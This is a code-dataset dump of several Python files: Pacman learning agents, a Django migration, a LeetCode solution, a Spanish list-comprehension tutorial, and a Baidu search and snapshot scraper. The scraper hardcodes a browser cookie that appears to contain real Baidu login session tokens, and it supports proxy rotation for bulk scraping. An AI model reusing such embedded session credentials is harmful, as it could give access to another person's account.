else:\n aux = 3\n legal_actions.remove(action)\n for possible_action in legal_actions:\n if number == aux:\n return possible_action\n else:\n aux += 1\n else:\n return random.choice(legal_actions)\n else:\n return action\n\n\nclass bfs_PacmanAgent(PacmanAgent):\n \"\"\"Agent that search for the shortest food using BFS algorithm.\"\"\"\n\n def choose_action(self, state, action, reward, legal_actions, explore):\n \"\"\"Choose the action that brigs Pacman to the neartest food.\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n explore: Boolean whether agent is allowed to explore.\n Returns:\n Sugested action\n \"\"\"\n queue = Queue.Queue()\n visited = []\n\n initial_position = state.get_position()\n\n food_map = state.food_map\n\n agent_map = state.get_map()\n\n queue.put(initial_position)\n visited.append(initial_position)\n\n closest_food = None\n while not queue.empty():\n\n if(closest_food is not None):\n break\n\n current_edge = queue.get()\n (k, l) = current_edge\n\n random.shuffle(PACMAN_ACTIONS)\n for actions in PACMAN_ACTIONS:\n\n diff = agent_map.action_to_pos[actions]\n new_edge = (k + diff[0],\n l + diff[1])\n\n if agent_map._is_valid_position(new_edge):\n if new_edge not in visited:\n (i, j) = new_edge\n if food_map[i][j] > 0.0:\n if closest_food is None:\n closest_food = new_edge\n else:\n queue.put(new_edge)\n visited.append(new_edge)\n\n if closest_food is None:\n return Directions.STOP\n\n return random.choice(legal_actions)\n\n best_action = None\n min_dist = float('inf')\n\n (f, p) = (0, 0)\n\n for actions in legal_actions:\n\n diff = agent_map.action_to_pos[actions]\n new_edge = (initial_position[0] + diff[0],\n initial_position[1] + diff[1])\n\n new_dist = state.calculate_distance(new_edge, closest_food)\n\n if new_dist <= min_dist:\n min_dist = new_dist\n best_action = actions\n (f, p) = new_edge\n\n food_map[f][p] = 0.0\n return best_action\n\n\nclass RandomGhostAgent(GhostAgent):\n \"\"\"GhostAgent that randomly selects an action.\"\"\"\n\n def choose_action(self, state, action, reward, legal_actions, explore):\n \"\"\"Choose a random action.\n\n If there is a legal action choose a random action\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n explore: Boolean whether agent is allowed to explore.\n Returns:\n Random action\n \"\"\"\n if len(legal_actions) > 0:\n return random.choice(legal_actions)\n\n\nclass NimblePacmanAgent(PacmanAgent):\n \"\"\"Pacman that run away from ghosts and get food.\n\n Attributes:\n agent_id: The identifier of an agent.\n ally_ids: The identifier of all allies agents.\n enemy_ids: The identifier of all enemies agents.\n \"\"\"\n\n def __init__(self, agent_id, ally_ids, enemy_ids):\n \"\"\"Extend the constructor from the PacmanAgent superclass.\n\n Args:\n agent_id: The identifier of an agent.\n ally_ids: The identifier of all allies agents.\n enemy_ids: The identifier of all enemies agents.\n \"\"\"\n super(NimblePacmanAgent, self).__init__(agent_id, ally_ids, enemy_ids)\n self.eat_behavior = behaviors.EatBehavior()\n\n def choose_action(self, state, action, reward, legal_actions, test):\n \"\"\"Choose the best action.\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n test: Boolean whether agent is allowed to explore.\n \"\"\"\n agent_map = state.get_map()\n (x, y) = state.get_position()\n\n nearby_enemies = []\n enemies_locations = []\n fragile_enemies_position = []\n\n for p in state.enemy_ids:\n q = state.get_agent_position(p)\n enemies_locations.append(q)\n if state.get_fragile_agent(p):\n fragile_enemies_position.append(q)\n FragileFlag = True\n else:\n FragileFlag = False\n\n for enemy_position in enemies_locations:\n distance = state.calculate_distance((x, y), enemy_position)\n if distance < 4:\n nearby_enemies.append(enemy_position)\n\n if len(nearby_enemies) == 0:\n suggested_action = self.eat_behavior(state, legal_actions)\n if suggested_action in legal_actions:\n return suggested_action\n elif legal_actions == []:\n return Directions.STOP\n else:\n return random.choice(legal_actions)\n\n elif FragileFlag is True:\n min_distance = float('inf')\n best_action = None\n for enemie in fragile_enemies_position:\n for actions in legal_actions:\n diff = agent_map.action_to_pos[actions]\n new_position = (diff[0]+x, diff[1]+y)\n new_distance = state.calculate_distance(new_position,\n enemie)\n if(new_distance < min_distance):\n min_distance = new_distance\n best_action = action\n if(best_action is not None):\n return best_action\n\n else:\n max_distance = (-1)*float('inf')\n best_action = None\n for actions in legal_actions:\n new_distance = 0\n for enemie in nearby_enemies:\n diff = agent_map.action_to_pos[actions]\n new_position = (diff[0]+x, diff[1]+y)\n new_distance += state.calculate_distance(new_position,\n enemie)\n if new_distance > max_distance:\n max_distance = new_distance\n best_action = actions\n return best_action\n\n\nclass EaterPacmanAgent(PacmanAgent):\n \"\"\"Greedy Pacman Agent.\n\n Args:\n eat_behavior: Implement the eat behavior.\n \"\"\"\n\n def __init__(self, agent_id, ally_ids, enemy_ids):\n \"\"\"Extend the constructor from the PacmanAgent superclass.\n\n Args:\n agent_id: The identifier of an agent.\n ally_ids: The identifier of all allies agents.\n enemy_ids: The identifier of all enemies agents.\n \"\"\"\n super(EaterPacmanAgent, self).__init__(agent_id, ally_ids, enemy_ids)\n self.eat_behavior = behaviors.EatBehavior()\n\n def choose_action(self, state, action, reward, legal_actions, test):\n \"\"\"Choose a suggested action.\n\n Choose a suggested action from the eat behavior in legal actions, or\n if there is not a legal action stay still, or in last case select a\n random action from legal actions.\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n explore: Boolean whether agent is allowed to explore.\n Returns:\n Suggested Action.\n \"\"\"\n suggested_action = self.eat_behavior(state, legal_actions)\n\n if suggested_action in legal_actions:\n return suggested_action\n elif legal_actions == []:\n return Directions.STOP\n else:\n return random.choice(legal_actions)\n\n\nclass BehaviorLearningPacmanAgent(PacmanAgent):\n \"\"\"Behavior Learning Pacman Agent.\n\n Attributes:\n features: features the Pacman can use.\n behaviors: list of Pacman possible behaviors.\n K: learning rate.\n exploration_rate: rate of exploration.\n learning: instance of QLearningWithApproximation.\n previous_behavior: The previous behavior used.\n behavior_count: The count of how much a behavior is used.\n reset_behavior_count: Call reset_behavior_count.\n test_mode: Set test mode to 'False'.\n \"\"\"\n\n def __init__(self, agent_id, ally_ids, enemy_ids):\n \"\"\"Constructor for the BehaviorLearningPacmanAgent.\n\n Extend the PacmanAgent constructor.\n\n Setup the features the pacman will use, the behaviors, the explotation\n and exploration rate, initialize a QLearningWithApproximation object\n initialize behavior count and set test mode to 'False'.\n\n Args:\n agent_id: The identifier of the agent.\n ally_ids: The identifiers of all the allies.\n enemy_ids: The identifiers of all the enemies.\n \"\"\"\n super(BehaviorLearningPacmanAgent, self).__init__(agent_id, ally_ids,\n enemy_ids)\n self.features = [features.FoodDistanceFeature()]\n for enemy_id in enemy_ids:\n self.features.append(features.EnemyDistanceFeature(enemy_id))\n for id_ in [agent_id] + ally_ids + enemy_ids:\n self.features.append(features.FragileAgentFeature(id_))\n\n self.behaviors = [behaviors.EatBehavior(),\n behaviors.FleeBehavior(),\n behaviors.SeekBehavior(),\n behaviors.PursueBehavior()]\n\n self.K = 1.0 # Learning rate\n self.exploration_rate = 0.1\n\n QLearning = learning.QLearningWithApproximation\n self.learning = QLearning(learning_rate=0.1, discount_factor=0.9,\n actions=self.behaviors,\n features=self.features,\n exploration_rate=self.exploration_rate)\n self.previous_behavior = self.behaviors[0]\n self.behavior_count = {}\n self.reset_behavior_count()\n\n self.test_mode = False\n\n def reset_behavior_count(self):\n \"\"\"Reset the behavior count for each behavior.\"\"\"\n for behavior in self.behaviors:\n self.behavior_count[str(behavior)] = 0\n\n def get_policy(self):\n \"\"\"Get the policy for the agent.\n\n Return:\n The agent weights.\n \"\"\"\n return self.learning.get_weights()\n\n def set_policy(self, weights):\n \"\"\"Set the policy for the agent.\n\n Set the learning agent weights.\n\n Args:\n weights: The weights of a feature.\n \"\"\"\n self.learning.set_weights(weights)\n\n def choose_action(self, state, action, reward, legal_actions, test):\n \"\"\"Choose an suggested action.\n\n Choose an suggested action, suggested by the QLearningWithApproximation\n class, or if not in legal actions, it chooses de Directions.STOP action\n or in the last case it is set to random.\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n test: enable or disable test mode.\n Returns:\n A suggested action from the QLearningWithApproximation\n \"\"\"\n if test:\n self.enable_test_mode()\n else:\n self.enable_learn_mode()\n\n if not self.test_mode:\n self.learning.learning_rate = self.K / (self.K + state.iteration)\n self.learning.learn(state, self.previous_behavior, reward)\n\n behavior = self.learning.act(state)\n self.previous_behavior = behavior\n suggested_action = behavior(state, legal_actions)\n\n self.behavior_count[str(behavior)] += 1\n\n if suggested_action in legal_actions:\n return suggested_action\n elif legal_actions == []:\n return Directions.STOP\n else:\n return random.choice(legal_actions)\n\n def enable_learn_mode(self):\n \"\"\"Enable Learn Mode.\n\n Set the exploration rate of learning to the class exploration rate.\n \"\"\"\n self.test_mode = False\n self.learning.exploration_rate = self.exploration_rate\n\n def enable_test_mode(self):\n \"\"\"Enable Test Mode.\"\"\"\n self.test_mode = True\n self.learning.exploration_rate = 0\n\n\nclass BehaviorLearningGhostAgent(GhostAgent):\n \"\"\"Behavior Learning Ghosts Agent.\n\n Attributes:\n features: features the Pacman can use.\n behaviors: list of Pacman possible behaviors.\n K: learning rate.\n exploration_rate: rate of exploration.\n learning: instance of QLearningWithApproximation.\n previous_behavior: The previous behavior used.\n behavior_count: The count of how much a behavior is used.\n reset_behavior_count: Call reset_behavior_count.\n test_mode: Set test mode to 'False'.\n \"\"\"\n\n def __init__(self, agent_id, ally_ids, enemy_ids):\n \"\"\"Constructor for the BehaviorLearningGhostAgent.\n\n Extend the GhostAgent constructor.\n\n Setup the features the ghosts will use, the behaviors, the explotation\n and exploration rate, initialize a QLearningWithApproximation object\n initialize behavior count and set test mode to 'False'.\n Args:\n agent_id: The identifier of the agent.\n ally_ids: The identifiers of all the allies.\n enemy_ids: The identifiers of all the enemies.\n \"\"\"\n super(BehaviorLearningGhostAgent, self).__init__(agent_id, ally_ids,\n enemy_ids)\n self.features = [features.FoodDistanceFeature()]\n for enemy_id in enemy_ids:\n self.features.append(features.EnemyDistanceFeature(enemy_id))\n for id_ in [agent_id] + ally_ids + enemy_ids:\n self.features.append(features.FragileAgentFeature(id_))\n\n self.behaviors = [behaviors.FleeBehavior(),\n behaviors.SeekBehavior(),\n behaviors.PursueBehavior()]\n\n self.K = 1.0 # Learning rate\n self.exploration_rate = 0.1\n QLearning = learning.QLearningWithApproximation\n self.learning = QLearning(learning_rate=0.1, discount_factor=0.9,\n actions=self.behaviors,\n features=self.features,\n exploration_rate=self.exploration_rate)\n self.previous_behavior = self.behaviors[0]\n self.behavior_count = {}\n self.reset_behavior_count()\n self.actual_behavior = self.previous_behavior\n self.test_mode = False\n\n def reset_behavior_count(self):\n \"\"\"Reset behavior count for each behavior.\"\"\"\n for behavior in self.behaviors:\n self.behavior_count[str(behavior)] = 0\n\n def get_policy(self):\n \"\"\"Get the policy for the agent.\n\n Return:\n The agent weights.\n \"\"\"\n return self.learning.get_weights()\n\n def set_policy(self, weights):\n \"\"\"Set the policy for the agent.\n\n Set the learning agent weights.\n\n Args:\n weights:\n \"\"\"\n self.learning.set_weights(weights)\n\n def choose_action(self, state, action, reward, legal_actions, test):\n \"\"\"Choose an suggested action.\n\n Choose an suggested action, suggested by the QLearningWithApproximation\n class, or if not in legal actions, it chooses de Directions.STOP action\n or in the last case it is set to random.\n\n Args:\n state: Current game state.\n action: Last executed action.\n reward: Reward for the previous action.\n legal_actions: List of currently allowed actions.\n test: enable or disable test mode.\n Returns:\n A suggested action from the QLearningWithApproximation\n \"\"\"\n if test:\n self.enable_test_mode()\n else:\n self.enable_learn_mode()\n\n if not self.test_mode:\n self.learning.learning_rate = self.K / (self.K + state.iteration)\n self.learning.learn(state, self.previous_behavior, reward)\n\n # print (\"\\nAgente {} Comunica:\".format(self.agent_id))\n # print (\"Antes - Behavior do agente {}: {}\".\n # format(self.agent_id, self.actual_behavior))\n behavior = self.learning.act(state, self.actual_behavior)\n self.actual_behavior = behavior\n self.previous_behavior = behavior\n # print (\"Depois - Behavior do agente {}: {}\".\n # format(self.agent_id, behavior))\n\n suggested_action = behavior(state, legal_actions)\n\n self.behavior_count[str(behavior)] += 1\n\n if suggested_action in legal_actions:\n return suggested_action\n elif legal_actions == []:\n return Directions.STOP\n else:\n return random.choice(legal_actions)\n\n def enable_learn_mode(self):\n \"\"\"Enable Learn Mode.\n\n Set the exploration rate of learning to the class exploration rate.\n \"\"\"\n self.test_mode = False\n self.learning.exploration_rate = self.exploration_rate\n\n def enable_test_mode(self):\n \"\"\"Enable Test Mode.\"\"\"\n self.test_mode = True\n self.learning.exploration_rate = 0\n","sub_path":"pacman/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":36879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"248767908","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('habilidades', '0010_auto_20150616_1300'),\n ('usuarios', '0012_auto_20150609_1304'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='teNecesitoModel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('mensaje', models.CharField(max_length=200)),\n ('fecha', models.DateTimeField(auto_now=True)),\n ('habilidadSolicitada', models.ForeignKey(to='habilidades.habilidadesModel')),\n ('usuarioRequerido', models.ForeignKey(related_name=b'requerido', to='usuarios.perfilUsuarioModel')),\n ('usuarioSolicitante', models.ForeignKey(related_name=b'solicitante', to='usuarios.perfilUsuarioModel')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"necesito/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"280750025","text":"# 703-Kth_Largest_Element_in_a_Stream_EASY.py\n\n# https://leetcode.com/problems/kth-largest-element-in-a-stream/\n\n# Design a class to find the kth largest element in a stream. Note that it is the kth largest element in the sorted order, not the kth distinct element.\n\n# Your KthLargest class will have a constructor which accepts an integer k and an integer array nums, which contains initial elements from the stream. For each call to the method KthLargest.add, return the element representing the kth largest element in the stream.\n\n# Example:\n\n# int k = 3;\n# int[] arr = [4,5,8,2];\n# KthLargest kthLargest = new KthLargest(3, arr);\n# kthLargest.add(3); // returns 4\n# kthLargest.add(5); // returns 5\n# kthLargest.add(10); // returns 5\n# kthLargest.add(9); // returns 8\n# kthLargest.add(4); // returns 8\n# Note:\n# You may assume that nums' length ≥ k-1 and k ≥ 1.\n\nfrom typing import List\n\nclass KthLargest:\n\n def __init__(self, k: int, nums: List[int]):\n\n self.k = k\n self.nums = nums\n # Initialize with sorted array of the largest elements of nums:\n self.kth_largest_elements = sorted(nums)[-k:]\n\n\n def add(self, val: int) -> int:\n\n # check if bigger than kth largest, or if kth largest isn't full\n if (\n (len(self.kth_largest_elements) < self.k) or\n (val > self.kth_largest_elements[0])\n ):\n self.insert_and_sort(val)\n\n # return minimum element. safe bc we always have one element by\n # this point even if starting with nums = []\n return self.kth_largest_elements[0]\n\n\n def insert_and_sort(self, val: int) -> None:\n \"\"\"Insert single element into list and re-sort the list.\"\"\"\n\n # add the value if an empty list:\n if self.kth_largest_elements == []:\n self.kth_largest_elements.append(val)\n return\n\n # O(NlogN) insert (32 ms with example)\n\n # replace minimum with added element if larger\n if (len(self.kth_largest_elements) < self.k):\n self.kth_largest_elements.append(val)\n else:\n self.kth_largest_elements[0] = val\n\n # re-sort self.kth_largest_elements\n self.kth_largest_elements = sorted(self.kth_largest_elements)\n\n # # O(N) insert (24 ms with example)\n # # Too slow for leetcode\n\n # # Insert before element larger or equal to val\n\n # # Remove the smallest element or add a new smallest element\n # if (len(self.kth_largest_elements) < self.k):\n # self.kth_largest_elements = [None] + self.kth_largest_elements\n # else:\n # self.kth_largest_elements[0] = None\n\n # i = 0\n # while i < len(self.kth_largest_elements) - 1:\n # # check if the next element is equal or larger, if so insert in i-1\n # if self.kth_largest_elements[i + 1] >= val:\n # self.kth_largest_elements[i] = val\n # break\n # # if not, then swap the next element and the previous\n # # to move the empty space down\n # else:\n # self.kth_largest_elements[i] = self.kth_largest_elements[i + 1]\n # self.kth_largest_elements[i + 1] = None\n\n # i += 1\n\n # # if largest element, insert at the end\n # if self.kth_largest_elements[-1] == None:\n # self.kth_largest_elements[-1] = val\n\n\n\n# Your KthLargest object will be instantiated and called as such:\n# obj = KthLargest(k, nums)\n# param_1 = obj.add(val)\n\n\n# Assumptions\n# elements are numeric\n# k elements can fit on a single machine or the api for multi-machine\n# lists is the same as on a single machine\n\n# Approach\n# Keep a sorted array of the kth largest elements so far.\n# initialize with sorted array of the largest elements of nums.\n# Keep the minimum element in the largest elements\n# If the new element is larger than the minimum, replace\n# the minimum with it and re-sort the largest elements.\n# Return the minimum element on each add.\n\n# Complexity\n# Time\n# Each insert we have to check whether it is larger than the smallest\n# element (the kth largest). If it is we need to insert and re-sort\n# the largest elements. Everything other than the re-sort is O(1) and\n# the re-sort can be done in O(NlogN) time. However if we start with\n# a sorted list, we are only inserting one element. We can do that in O(N)\n# time by checking each value and inserting before any that are larger.\n# Space\n# O(k) since we store the kth largest elements and a few variables\n\n# Potential improvements\n# Maybe instead of sorting on each insert of the kth list we can iterate\n# through it until we find a larger element than the one to be inserted\n# and then insert it before that element.\n\n# This could also be done with a min heap of size k\n# Also the insertion can be done with a binary search type algorithm to\n# find where to insert\n\n\n# Edge cases\n# I can't think of any. All are covered in the example note\n\n\n# Examples:\n\n# Given\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[3,[4,5,8,2]],[3],[5],[10],[9],[4]]\n\n# list index out of range\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[1,[]],[-3],[-2],[-4],[0],[4]]\n\n# Wrong Answer\n# Input\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[2,[0]],[-1],[1],[-2],[-4],[3]]\n# Output\n# [null,-1,1,-2,-4,3]\n# Expected\n# [null,-1,0,0,0,1]\n\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[3,[4,5,8,2]],[3],[5],[10],[9],[4]]\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[1,[]],[-3],[-2],[-4],[0],[4]]\n# [\"KthLargest\",\"add\",\"add\",\"add\",\"add\",\"add\"]\n# [[2,[0]],[-1],[1],[-2],[-4],[3]]\n\n\n\n\n\n\n\n\n\n","sub_path":"leetcode/703-Kth_Largest_Element_in_a_Stream_EASY.py","file_name":"703-Kth_Largest_Element_in_a_Stream_EASY.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"211228330","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 2 08:42:48 2021\r\n\r\n@author: Jose Luis Robledo\r\n\r\n\r\nComprensión de listas\r\n\r\nEs un tipo de construcción que consta de una expresión que determina cómo \r\nmodificar los elementos de una lista, seguida de una o varias clausulas for y, \r\nopcionalmente, una o varias clausulas if. \r\nEl resultado que se obtiene es una lista.\r\n\r\n\r\n\"\"\"\r\n\r\nlista = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\n\r\n# Cada elemento de la lista se eleva al cubo\r\ncubos = [valor ** 3 for valor in lista]\r\nprint('Cubos de 1 a 10:', cubos)\r\n\r\n\r\n\r\nx= (1, 3, 4)\r\ny=1\r\nz=3\r\nvariable = lambda x,y,z: x[2] if x[0]==y and x[1]==z else 0\r\nprint(variable(x,y,z))\r\n\r\n\r\n\r\nnumeros = [135, 154, 180, 193, 210]\r\ndivisiblespor3 = [valor for valor in numeros if valor % 3.0 == 0] \r\ndiv3Lambda = list(filter(lambda x : x%3 == 0, numeros))\r\nprint(divisiblespor3)\r\nprint(div3Lambda)\r\n \r\n\r\n# Muestra lista con los números divisibles por 3\r\nprint(divisiblespor3) \r\n\r\n\r\n# Define función devuelve el inverso de un número\r\ndef funcion(x):\r\n return 1/x\r\n\r\ninv=lambda x:1/x\r\n\r\nlista2 = [1, 2, 3] # declara lista\r\n\r\n# Muestra lista con inversos de cada número\r\nprint([funcion(index) for index in lista2])\r\nprint([inv(elemento) for elemento in lista2])\r\n\r\n\r\nresultado = lambda x:[1/x for x in lista2]\r\nprint(resultado) \r\n\r\n\r\nlis=[1,2,3]\r\n\r\nlis2=[4,5,6]\r\n\r\nlista=[(1,2), (1,2), (1,2), (1,2)]\r\n\r\n\r\n\r\ncomprension = lambda lista: [[x] for x in lista]\r\n\r\nprint(comprension)","sub_path":"pandas/programacionFuncional7_ComprensionListas.py","file_name":"programacionFuncional7_ComprensionListas.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"480150654","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n 脚本名: 百度快照\nCreated on 2018-12-19\n@author:David Yisun\n@group:data\n\"\"\"\nimport requests\nimport codecs\nimport pipline\nfrom bs4 import BeautifulSoup\nimport re\nimport time\nimport traceback\n\nclass BaiduMainPage(object):\n url = 'https://www.baidu.com/s?wd={query}&pn={begin}&oq={query}&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=8460c003000041d8&rsv_t=ad2aqJ3Xx3EmAaLI3lNWNV9csWxTR9rdBLhn/b6L9lsixrMb1E9y4dgEEalZgUsNBIYV'\n headers = {}\n headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n headers['Accept-Encoding'] = 'gzip, deflate, br'\n headers['Accept-Language'] = 'zh-CN,zh;q=0.9'\n headers['Cache-Control'] = 'max-age=0'\n headers['Connection'] = 'keep-alive'\n headers['Cookie'] = 'BIDUPSID=1B0624DB91D6B86D61BC78197CFCB16D; PSTM=1513914037; __cfduid=dd303636c42617357f780112656b6b3ed1516424757; BD_UPN=12314753; BDUSS=DJzTms1ei1nQmRPeThXRU84MWRFNXM1NjNweGc5dnJ4TWZ0cmc3Z3dsNEw2eWxiQVFBQUFBJCQAAAAAAAAAAAEAAACCG2IUanVucmVuNTAyNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAteAlsLXgJbV; ispeed_lsm=0; MCITY=-340%3A; BAIDUID=5565517DE650311BD281189A14755D35:FG=1; BDORZ=B490B5EBF6F3CD402E515D22BCDA1598; delPer=0; BD_CK_SAM=1; PSINO=7; BDRCVFR[feWj1Vr5u3D]=mk3SLVN4HKm; H_PS_PSSID=28118_1452_21084_19897_28132_27751_28140_22157; sugstore=1; H_PS_645EC=42edEeet9x%2BSALmsNibWHoI27RP%2FN1eGe6AYdOZTNMZ4F73UeIoHTJU15GSqG3pJLLxb'\n headers['Host'] = 'www.baidu.com'\n headers['Upgrade-Insecure-Requests'] = '1'\n headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n\n # 代理ip\n proxies_ip = {'HTTP': [],\n 'HTTPS': []}\n\n def __init__(self, project_name):\n self.project_name = project_name\n return\n\n def proxy_pool(self, file_names, head):\n with codecs.open(file_names, 'r', 'utf-8') as f:\n data = f.read()\n self.proxies_ip[head] = data.splitlines()\n\n def data_preprocess(self, filename, is_flushdb=False):\n \"\"\"\n 数据预处理 将url写进redis\n :param is_flushdb:\n :return:\n \"\"\"\n pipline.push_data_to_redis(url='{0}', crawler_name=self.project_name,\n is_flushdb=is_flushdb, filename=filename)\n \n def request(self, query, begin=0, proxy=None):\n url = self.url.format(begin=begin, query=query)\n if proxy==None:\n res = requests.get(url=url, headers=self.headers)\n else:\n res = requests.get(url=url, headers=self.headers, proxies=proxy)\n res.encoding = res.apparent_encoding\n return res\n \n def parse(self, text):\n soup = BeautifulSoup(text, 'lxml')\n content_left = soup.find_all('div', id='content_left')[0]\n result = []\n for container in content_left.find_all('div', class_='result c-container '):\n abstracts = container.find_all('div', class_=\"c-abstract\")\n ems = [] # 匹配词\n sentense = []\n for abstract in abstracts:\n ems += [i.text for i in abstract.find_all('em')]\n sentense.append(abstract.text)\n links = [i.get('href') for i in container.find_all('a', text='百度快照')]\n result.append([ems, sentense, links])\n return result\n\n def fileter(self, ems, keys):\n def _filter(k):\n res = False\n for i in ems:\n if re.findall(k, i) != []:\n res = True\n return res\n return res\n result = list(map(_filter, keys))\n if sum(result) == len(keys):\n return True\n else:\n return False\n\n def request_from_redis(self, max_step=30000, sleep=1):\n r = pipline.connect_redis().con\n step = 1\n error_step = 0\n while True:\n query = r.lpop(self.project_name)\n print('='*60)\n t1 = time.time()\n if query == None or step>max_step:\n break\n query = query.decode('utf-8')\n print('step: {0}'.format(step))\n print(query)\n # 获取有效links\n links = []\n get_data = False\n\n try:\n for page in [0]: # 每个query爬取10页\n _links = self.parse(text=self.request(query=query, begin=page).text)\n links += [link[2] for link in _links if self.fileter(ems=link[0], keys=query.split(' ')) and link[2] != []]\n time.sleep(1)\n for link in links:\n baidu_snapshot = BaiduSnapshot(url=link[0], keys=query.split(' '))\n result = baidu_snapshot.get_text()\n if result == []:\n continue\n data = {'query':query, 'text':result}\n pipline.insert_data_to_mongo(db_name=self.project_name, collection_name='text', data=data)\n get_data = True\n error_step = 0\n except Exception as e:\n try:\n print('url:{0}'.format(link))\n except:\n pass\n print(traceback.print_exc())\n error_step += 1\n if not get_data:\n r.rpush(self.project_name, query)\n # try:\n # for page in [0, 10, 20, 30]: # 每个query爬取4页\n # _links = self.parse(text=self.request(query=query, begin=page).text)\n # links += [link[2] for link in _links if self.fileter(ems=link[0], keys=query.split(' '))]\n # time.sleep(1)\n # for link in links:\n # baidu_snapshot = BaiduSnapshot(url=link[0], keys=query.split(' '))\n # result = baidu_snapshot.get_text()\n # pipline.insert_data_to_mongo(db_name=self.project_name, collection_name='text', data=result)\n # get_data = True\n # except Exception as e:\n # print(e)\n # error_step += 1\n # if not get_data:\n # r.rpush(self.project_name, query)\n if error_step >5:\n print('continuous errors')\n break\n t2 = time.time()\n print('time takes {0}'.format(t2-t1))\n print('=' * 60)\n step += 1\n time.sleep(sleep)\n # 断开连接\n r.connection_pool.disconnect()\n\n\nclass BaiduSnapshot(object):\n \"\"\"\n 百度快照链接\n \"\"\"\n headers = {}\n headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\n headers['Accept-Encoding'] = 'gzip, deflate'\n headers['Accept-Language'] = 'zh-CN,zh;q=0.9'\n headers['Cache-Control'] = 'max-age=0'\n headers['Connection'] = 'keep-alive'\n headers['Host'] = 'cache.baiducontent.com'\n headers['Referer'] = 'https://www.baidu.com/s?wd=%E8%AF%9D%20%E9%82%A3%20%E6%8A%95%20%E5%88%B0&pn=0&oq=%E8%AF%9D%20%E9%82%A3%20%E6%8A%95%20%E5%88%B0&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=be9013fd000054dc&rsv_t=d375QQ5FryyawsGUN7O%2FGu1aoVXD9fk18nJRNoygXwbtJh%2BcVCckbsV208CFS9wMhaf%2B'\n headers['Upgrade-Insecure-Requests'] = '1'\n headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n\n def __init__(self, url, keys):\n self.url = url\n self.keys = keys\n return\n\n def request(self, proxy=None):\n if proxy==None:\n res = requests.get(url=self.url, headers=self.headers)\n else:\n res = requests.get(url=self.url, headers=self.headers, proxies=proxy)\n res.encoding = res.apparent_encoding\n return res\n\n def fileter(self, ems, keys):\n def _filter(k):\n res = False\n for i in ems:\n if re.findall(k, i) != []:\n res = True\n return res\n return res\n result = list(map(_filter, keys))\n if sum(result) == len(keys):\n return True\n else:\n return False\n\n def parse(self, text, keys):\n soup = BeautifulSoup(text, 'lxml')\n result = []\n tags = set()\n for tag in soup.find_all('b', style=re.compile('color:black;background-color:.{1,8}')):\n tags.add(tag.parent)\n for tag in tags:\n text = tag.text\n ems = [i.text for i in tag.find_all('b', style=re.compile('color:black;background-color:.{1,8}'))]\n if self.fileter(ems=ems, keys=keys):\n result.append(text)\n return result\n\n def get_text(self, proxy=None):\n res = self.request(proxy=proxy)\n result = self.parse(text=res.text, keys=self.keys)\n return result\n\ndef single_request(query='都是 五 年'):\n main_page = BaiduMainPage(project_name='baidukuaizhao_suanfa_4_grams')\n res = main_page.request(query=query)\n result = main_page.parse(text=res.text)\n return result\n\ndef main_spider(go_on=True):\n project = BaiduMainPage(project_name='baidukuaizhao_suanfa_4_grams')\n # 数据预处理\n if not go_on:\n project.data_preprocess(is_flushdb=True, filename='./data/query.txt')\n # 设置代理ip\n # project.proxy_pool(file_names='../crawler_utils/')\n # 爬虫\n project.request_from_redis(max_step=50000, sleep=2)\n\nif __name__ == '__main__':\n # single_request()\n main_spider(go_on=True)\n # main_spider(go_on=False)\n","sub_path":"baidu/baidukuaizhao/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":9720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"1405148","text":"\"\"\"\nProblem :\nGiven a char array representing tasks CPU need to do.\nIt contains Integers where different integers represent different tasks.\nTasks has to 